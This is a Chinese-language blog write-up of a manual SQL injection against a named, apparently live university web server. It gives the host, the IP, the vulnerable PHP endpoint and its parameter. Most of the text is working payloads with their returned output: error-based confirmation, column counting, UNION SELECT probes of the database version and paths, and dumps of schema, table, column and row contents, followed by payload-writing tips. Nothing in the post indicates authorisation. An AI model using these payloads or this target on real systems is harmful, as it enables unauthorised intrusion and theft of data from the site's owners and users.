记一次MySQL手工注入案例
[Penetration Testing]
记录一次手动注入学校某站MySQL的过程
信息收集
发现方式
子域名扫描 -> 导入awvs -> 批量扫blind-injection
url
http://home.bjtu.edu.cn/
info(whatweb)
- 202.112.147.124(学校内网)
- Apache/2.4.9
- Win64
- PHP/5.5.12
parameter
http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)
测试
确认注入 =>tid
分号报错,有回显:
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6
判断版本 >4.0
and ord(mid(version(),1,1))>51
返回正常,说明版本>4.0,支持union
查字段数 =>5
order by+二分法
tid=1 and order by 6=> Unknown column ‘6’ in ‘order clause’tid=1 and order by 5=> [{“item_title”:”3”,”item_id”:”3”,”item_count”:36},{“item_title”:”4”,”item_id”:”4”,”item_count”:22},{“item_title”:”5”,”item_id”:”5”,”item_count”:66},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92”,”item_id”:”2”,”item_count”:84},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00”,”item_id”:”1”,”item_count”:103}]
union+select
tid=1 and 1=2 union select 1,2,3,4,5...,n
- 错误输出:
The used SELECT statements have a different number of columns
- 正确输出:
[{"item_title":"2","item_id":"1","item_count":4}]
信息收集
and 1=2 union select [function],-1,-1,-1,-1
- version() 查询数据库版本=>5.6.17
- database() 查询当前连接的数据库=>stu
- @@version_compile_os 查询当前操作系统=>Win64
- @@datadir 查询读取数据库路径=>c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir 查询MYSQL安装路径
获取所有库名
in
select * from stu where tid=1
and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.columns;
或者:
select * from stu where tid=1
and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;
out
[{"item_title":"-1","item_id":"information_schema","item_count":-1},
{"item_title":"-1","item_id":"mysql","item_count":-1},
{"item_title":"-1","item_id":"performance_schema","item_count":-1},
{"item_title":"-1","item_id":"stu","item_count":-1},
{"item_title":"-1","item_id":"student","item_count":-1}]
获取stu中的表名
in(含处理输出格式)
select * from stu where tid=1
and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1 from information_schema.columns where table_schema="stu";
out
[{"item_title":"-1","item_id":"[xxoo]
fsa_about,
fsa_contest_and_project,
fsa_css3_example,
fsa_nav_feedback,
fsa_nav_feedback_type,
fsa_nav_list,
fsa_nav_page_list,
fsa_nav_page_list_1,
fsa_nav_page_list_395,
fsa_nav_page_list_396,
fsa_nav_page_list_398,
fsa_nav_page_list_399,
fsa_nav_page_list_400,
fsa_nav_page_list_401,
fsa_nav_page_list_402,
fsa_nav_page_list_403,
fsa_nav_page_list_404,
fsa_nav_
...
[xxoo]","item_count":-1}]
获取fsa_vote_topic中的列名
in
and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'
out
{"item_title":"-1","item_id":"[xxoo]
topic_id,
topic_title,
topic_type_id
[xxoo]","item_count":-1}]
确定字段数
in
and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic
out
[{"item_title":"-1","item_id":"[xxoo]
12
[xxoo]","item_count":-1}]
获取字段值
in
依次改变limit值可爆出多列内容
and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1
out
[{"item_title":"-1","item_id":"[xxoo]
\u5b66\u4e60\u8bdd\u98981
[xxoo]","item_count":-1}]
解码后为=> 学习话题1
注意
在写payload时,特别注意函数中的参数不用加引号,而使用等号赋值时需要加引号.
不加的情况(topic_title)(fsa_vote_topic):
concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1
加的情况(有等号赋值时)
here table_name='fsa_vote_topic'